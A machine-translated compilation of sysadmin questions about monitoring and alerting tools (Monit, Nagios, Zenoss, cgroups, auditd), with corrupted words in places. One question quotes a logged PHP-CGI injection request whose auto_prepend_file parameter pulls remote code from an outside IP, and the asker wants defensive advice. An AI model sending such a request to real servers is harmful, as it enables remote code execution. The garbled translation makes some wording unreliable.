Monits内容检查有问题。 我知道我可以像这样检查日志文件 check file test.log with path logs/test.log if not match "something" for 5 cycles then alert 但是日志文件有很多variables,而且它的增长非常快,所以它在每一行都提醒我。 我遇到的问题是我需要忽略其他的一切。 我知道我可以在monit check内容中忽略variables,但这不会帮助我,因为每秒都会有数字发生变化。 我需要一种方法来检查这个日志文件,文件大小和时间戳不会帮助我,因为如果数据库丢失日志文件仍然在增长,因为它给我错误数据库已经消失。 现在我需要一种方法来监视它,所以我知道我的消息将发送给用户。 有没有人有这个好的解决scheme。 我真的需要它。
我有监控24/7/365监控,并发送警报到一个电子邮件地址和文字信息平等的手机。 不过,我现在想在晚上停止电话短信,所以他们不叫我起床。 我不能让手机静音,因为我们正在紧急呼吁任何可能需要我们的亲属。 我将在后面找出如何在任何时候“无法重新启动服务器”的短信。 我有这个在我的monitrc文件中: set alert [email protected] set alert [email protected] 所以我想通过添加类似于下面的东西(在单个服务“检查进程”文件中起作用)closuresvtext.com警报, not every "* 23,0-6 * * *" 任何想法如何实现? 谢谢,罗恩
我想让我的networking监控系统发送IM警报,而我在工作场所select的IM客户端是Skype。 是否有一个命令行驱动的API,不需要GUI Skype客户端,所以我可以在运行我的监控的Linux机器上运行它? 另外,有没有一个Jabber到Skype的网关可以解决这个问题?
我想用cgroups来限制linux中的资源 http://en.wikipedia.org/wiki/Cgroups 如果碰到一个限制,我怎么能通知。 例如,如果我将进程限制为2个演出或ram,如果我没有主动监视它,我将如何知道它何时到达?
我一直是一个nagios用户。 最近,随着服务器机队规模的增长,nagios的警报数量也随之增长。 信噪比已经很低了。 例如。 当一个普通的服务失败时 – 所有使用该服务的负载平衡的networking服务器,因此检查它开始提醒。 与系统警报混合可能从该服务出现在不同的顺序导致大量的噪音。 我可以花很多时间和确保我的nagiosconfiguration是好的,但是它越来越难以pipe理。 我正在寻找一个工具(或Nagios的插件),重复删除和智能抑制警报。 此外,我还希望在问题售票系统中跟踪“问题”/中断情况 – 这样,任何人都可以有一个地方来处理发生问题的情况。 也看看档案。 是的,我可以在一定程度上在Nagios做 – 但它不是很好。 当我看到我发现了大量的工具( http://www.slac.stanford.edu/xorg/nmtf/nmtf-tools.html#public ),但似乎没有人谈论像重复数据删除,问题跟踪和pipe理
有没有人成功configurationZenoss发送短信或语音提示? 谷歌search只为Zenoss提供一个名为TeamTILT的服务。 这是唯一的select吗? 有没有人解决这个不使用此服务? 谢谢。
今天我收到了不同IP的一些漏洞攻击。 GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt info3.txt的内容是: Google在过去的几天里正在展示一大堆人在谈论这个问题,但没有真正的解决scheme或解释。 有一个写在: http : //huguesjohnson.com/programming/hacking-attempt/ “我认为这是我现在要离开的地方,我不知道这个网站是否属于犯罪集团的一部分,但是因为它可以访问僵尸networking,所以我认为它是81.17.24.82 IP没有出现任何恶意软件经销商的地方,也许这是一个最近被攻破的networking服务器,或者是最近被组织这次攻击的一个IP地址。 我的问题是:这种情况下的下一步是什么? pipe理员应该遵循以通知安全人员的最佳做法是什么? 你遵循哪些网站来保持这样的事情,并应用适当的安全措施(如mod_security)?
我担心我们的一台服务器因为几个原因而被滥用。 有没有一种工具可以在用户login到服务器时发送电子邮件? 我希望收到尽可能多的信息在后台发送给我的电子邮件。 谢谢
当发生某种事件时,我有许多系统和服务发送电子邮件警报。 这对less数系统来说工作正常,但随着警报数量的增加,重要的信息在信息通知中变得不那么明显。 电子邮件过滤只能有效的一点。 我可以使用什么样的解决scheme来代替电子邮件,这些电子邮件将允许我从各种服务发送任意警报,并随着服务数量的增长轻松扩展?
我需要在我的环境中设置审计,特别是文件完整性监视。 我试过OSSEC ,但发现它很麻烦。 自从我发现了auditd (已经安装在我的CentOS 6系统上),发现它是一个简单但强大的审计解决scheme。 我知道命令行工具aureport用于生成统计信息或由auditdlogging的文件更改列表,它很好地工作。 不过,目前我已经有大约100台Linux主机,并且需要find一个更stream畅的方式来提醒重要文件的更改。 是否有任何开源报告工具或仪表板位于auditd之上,用于聚合networking中的多个主机? 在searchnetworking和github时我没有看到任何东西。 作为奖励,将auditd报告的文件更改与来自puppetmaster / puppetDB主机的木偶报告中的文件更改报告相结合以显示预期的更改并且不会触发警报或显示在报告。 现有解决scheme的任何build议或关于此文件完整性监测主题的提示?